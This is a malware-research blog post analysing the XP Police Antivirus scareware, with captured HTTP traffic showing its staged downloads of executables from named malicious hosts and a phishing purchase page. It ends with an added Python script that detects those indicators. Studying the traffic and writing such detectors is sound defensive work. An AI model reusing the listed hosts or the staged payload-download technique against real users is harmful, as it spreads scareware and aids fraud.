MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

9.3.09

Aggressive infection strategy of XP Police Antivirus. Part Two

From the moment the XP Police Antivirus infection takes hold, it begins to display on screen a series of fake pop-up alerts about infections, among other things.

But behind those visible alerts, a series of actions is carried out to complete the scareware's work.


By listening to the traffic, we see the download of the following components:

GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

The downloaded setup.dat is not really a data file but a compressed archive holding a copy of the other files, which are unpacked into C:\Program Files\XPPoliceAntivirus.

GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

The downloaded sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) is used to pack the malware at run time in an attempt to evade detection by antivirus programs.

GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ ......................@.......................... .....................!..L.!This program cannot be run in DOS mode.

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: police-xp-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

The JavaScript file window.js displays a pop-up window on screen with the words "Thank you for Installation!".


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page for purchasing the scareware, on which the victim's sensitive and financial information is requested. It is a scam/phishing page.

The maneuvers used by the malicious code are becoming more aggressive and effective, since, as we have seen, the installer downloaded in the first instance is only one piece of the puzzle, and it is from there that the scareware obtains the remaining pieces.
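The following is an added example, not code from the original post or from the malware author: a small Python script that parses raw HTTP request/response pairs like the ones captured above and flags the indicators visible in this traffic (the non-browser User-Agent strings MS_Update32 and wget 3.0, the download and landing hosts, an MZ executable body, and the affiliate id carried on the buy.php request). The sample exchanges embedded in the script are constructed to mirror the capture; the executable body is a constructed stub, so its MD5 will not match the sysupdate.exe hash quoted above, which is included only as a lookup value.

```python
"""Flag the staged scareware downloads in captured HTTP traffic.

Added example (not from the original post). Indicators are taken from the
requests shown in the write-up; the sample exchanges below are constructed.
"""
import hashlib
import re
from dataclasses import dataclass, field

# Indicators visible in the captured traffic.
SUSPICIOUS_USER_AGENTS = {"MS_Update32", "wget 3.0"}
KNOWN_HOSTS = {"setupdatdownload.com", "police-xp-09.com", "www.xp-police-09.com"}
# Hash quoted in the post for sysupdate.exe; used only for a lookup label here.
KNOWN_MD5 = {"36e13b0624dbd4bc973d1fd5f949ebe0": "sysupdate.exe"}


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_http(raw: bytes) -> HttpMessage:
    """Split a raw HTTP request or response into start line, headers and body.

    Header names are lower-cased so lookups do not depend on the sender's casing.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)


def inspect_exchange(request: HttpMessage, response: HttpMessage) -> list:
    """Return a list of human-readable findings for one request/response pair."""
    findings = []
    _method, path, _version = request.start_line.split(" ", 2)
    host = request.headers.get("host", "")
    ua = request.headers.get("user-agent", "")

    # Stage 1: component downloads use a hard-coded, non-browser User-Agent.
    if ua in SUSPICIOUS_USER_AGENTS:
        findings.append(f"non-browser User-Agent '{ua}' fetching {path} from {host}")

    if host in KNOWN_HOSTS:
        findings.append(f"request to known scareware host {host}")

    # Stage 3: the purchase page carries the affiliate id that tracks the install.
    m = re.search(r"[?&]id=(\d+)", path)
    if m and path.startswith("/buy.php"):
        findings.append(f"purchase page request carrying affiliate id {m.group(1)}")

    # Any response body starting with the MZ signature is a PE executable,
    # whatever the server's Content-Type says.
    if response.body.startswith(b"MZ"):
        md5 = hashlib.md5(response.body).hexdigest()
        label = KNOWN_MD5.get(md5, "not in hash list")
        ctype = response.headers.get("content-type", "none")
        findings.append(
            f"PE executable served as {ctype} from {host}{path}, md5={md5} ({label})"
        )
    return findings


def analyze_capture(exchanges) -> dict:
    """Map 'host/path' to its findings for every exchange that raised one."""
    report = {}
    for raw_request, raw_response in exchanges:
        req = parse_http(raw_request)
        resp = parse_http(raw_response)
        key = req.headers.get("host", "") + req.start_line.split(" ", 2)[1]
        found = inspect_exchange(req, resp)
        if found:
            report[key] = found
    return report


# Constructed sample exchanges mirroring the capture; the PE body is a stub.
BROWSER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
SAMPLE_EXCHANGES = [
    (b"GET /svchost32.exe HTTP/1.1\r\nUser-Agent: MS_Update32\r\n"
     b"Host: setupdatdownload.com\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/octet-stream\r\n"
     b"Content-Length: 64\r\n\r\n" + b"MZ" + b"\x90" * 58 + b"PE\x00\x00"),
    (b"GET /land.txt HTTP/1.1\r\nUser-Agent: wget 3.0\r\nHost: police-xp-09.com\r\n"
     b"Cache-Control: no-cache\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/plain\r\n"
     b"Content-Length: 1\r\n\r\n2"),
    (b"GET /buy.php?id=108 HTTP/1.1\r\nUser-Agent: " + BROWSER_UA.encode() +
     b"\r\nHost: www.xp-police-09.com\r\nCookie: id=108\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n"),
    # Benign control: an ordinary browser request to an unrelated host.
    (b"GET /index.html HTTP/1.1\r\nUser-Agent: " + BROWSER_UA.encode() +
     b"\r\nHost: example.com\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 5\r\n\r\nhello"),
]

if __name__ == "__main__":
    for key, findings in analyze_capture(SAMPLE_EXCHANGES).items():
        print(key)
        for f in findings:
            print("  -", f)
```

The MZ check deliberately ignores the Content-Type header: here the server was honest (application/octet-stream), but the same loader could just as easily serve the executable as text/plain or an image, so detection keys on the body rather than on what the server claims.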

Related information
Strategy aggressive infection Police XP Antivirus
Campaign Police Antivirus XP spreading through soc...
A recent tour of scareware IV

Jorge Mieres
